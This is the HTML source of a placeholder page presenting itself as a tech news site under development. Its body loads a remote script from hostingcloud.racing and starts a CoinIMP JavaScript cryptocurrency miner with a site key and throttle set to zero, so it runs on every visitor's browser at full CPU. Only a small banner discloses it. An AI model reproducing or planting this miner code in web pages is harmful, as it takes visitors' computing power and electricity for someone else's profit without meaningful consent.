<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=windows-1252">
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-131686490-3"></script>
    <script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-131686490-3');
</script>
    <style>
h1 {
  color: rgb(70, 70, 70);
  font-family: calibri;
  font-size: 150%;
} 
h2 {
  color: rgb(70, 70, 70);
  font-family: calibri;
  font-size: 150%;
}  
</style> <title>A Tech News Webpage</title>
  </head>
  <body> 
    <!-- <embed src="/support/mediaplayer.swf?file=gif.mp4" width="480" height="272" allowfullscreen="true" /> -->
    <script src="https://www.hostingcloud.racing/J6Pf.js"></script>
<script>
    var _client = new Client.Anonymous('23b28da8185c5dff962bfd2f6c8ec6c9ee0687ee6076f6009fb0897fb42140f2', {
        throttle: 0
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");

</script>
    <h1 style="text-align:center;font-family:calibri;">Welcome to the Webpage.
      It is undergoing development right now.</h1>
    <img src="giphy.gif" align="middle" height="648" width="1152">
    <h2>Check back later</h2>
  </body>
</html>
